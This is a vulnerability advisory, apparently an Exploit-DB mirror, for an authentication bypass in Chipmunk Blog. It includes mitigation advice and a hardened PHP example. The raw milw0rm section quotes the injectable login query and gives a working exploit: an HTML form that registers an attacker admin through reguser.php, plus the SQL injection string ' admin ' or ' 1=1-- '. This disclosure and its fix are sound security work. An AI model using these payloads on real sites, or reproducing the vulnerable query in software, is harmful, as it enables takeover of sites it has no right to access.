Vendor: Chipmunk Blog
By: x0r
CVSS: 7.5 (HIGH)
Authentication Bypass
CWE: 287
Product Name: Chipmunk Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Chipmunk Blog Add Admin Exploit/Auth Bypass

Chipmunk Blog is vulnerable to an authentication bypass that gives an attacker administrative access to the application. The application does not properly sanitize user-supplied input to the 'username' and 'password' parameters in the 'reguser.php' and 'authenticate.php' scripts, so an attacker can exploit the issue by supplying specially crafted 'username' and 'password' values when authenticating to the application.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to modify the application's logic. Additionally, the application should use a secure authentication mechanism to ensure that only authorized users can access the application.
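
One way to apply this mitigation, as an added example that is not Chipmunk Blog's code or the advisory author's: a parameterized login lookup and a session gate on admin registration. The `bl_admin` table and its `username`/`password` columns are taken from the snippet quoted in the advisory below; the function names, the `is_admin` session key, the move from `md5()` to `password_hash()`, and the in-memory SQLite database are assumptions made for the demo.

```php
<?php
declare(strict_types=1);

// Hardened lookup for authenticate.php: the username is bound as a parameter,
// so quote characters in it are data and never become SQL syntax.
function authenticate_admin(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password FROM bl_admin WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();   // false when no such user exists
    // Assumption: stored values were migrated from md5() to password_hash().
    return is_string($hash) && password_verify($password, $hash);
}

// Gate for reguser.php: only an already authenticated admin may add another.
function may_register_admin(array $session): bool
{
    return ($session['is_admin'] ?? false) === true;
}

function register_admin(PDO $db, array $session, string $user, string $pass): bool
{
    if (!may_register_admin($session)) {
        return false;               // a real page would send 403 and exit here
    }
    $stmt = $db->prepare(
        'INSERT INTO bl_admin (username, password) VALUES (:u, :p)'
    );
    return $stmt->execute([
        ':u' => $user,
        ':p' => password_hash($pass, PASSWORD_DEFAULT),
    ]);
}

// Constructed demo data in an in-memory SQLite database (the original uses MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bl_admin (username TEXT PRIMARY KEY, password TEXT NOT NULL)');
register_admin($db, ['is_admin' => true], 'admin', 'correct horse battery');

// Case 1: valid credentials. Case 2: the string from the advisory, now looked
// up as a literal username. Case 3: registration attempt without a session.
var_dump(authenticate_admin($db, 'admin', 'correct horse battery'));
var_dump(authenticate_admin($db, "admin ' or ' 1=1--", 'anything'));
var_dump(register_admin($db, [], 'x0r', 'h4x0rz'));
```

In a deployed `reguser.php`, the `$session` argument would be `$_SESSION` after `session_start()`, and the check belongs at the very top of the script before any POST handling.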

Exploit-DB raw data:

#########################################################################################
[0x01] Information:

Script         : Chipmunk Blog
Download       : http://www.chipmunk-scripts.com/blog/blog.zip
Vulnerability  : Add Admin Exploit\Auth Bypass
Author         : x0r
Contact        : x0r@live.it \ andry2000@hotmail.it
Website        : NULL

#########################################################################################
[0x02] Bug: \admin\reguser.php \admin\authenticate.php

if (isset($_POST['submit'])) // name of submit button
{
   $username=$_POST['username'];
   $password=$_POST['password'];
   $password=md5($password);
   $getadmin="SELECT * from bl_admin where username='$username' and password='$password'";
   $getadmin2=mysql_query($getadmin) or die("Could not get admin");


#########################################################################################
[0x03] Exploit:

Add Admin:

<html>
<head>
<title> Chipmunk Blog (reguser.php) Add Admin Exploit (html)</title>
</head>
<body>
<form action=http://xxxxxxx/blog/admin/reguser.php method=post>
Username:<br>
<input type=text name='username' value='x0r' size="20"><br>
Password:<br>
<input type=text name='password' value='h4x0rz' size="20"><br>
<input type="text" name="pass2" value='h4x0rz' size="15"><br>
<input type=submit name='submit' value='submit'><br>
</form>
</body>
</html>

Exploit2: admin ' or ' 1=1--
#########################################################################################

# milw0rm.com [2009-01-28]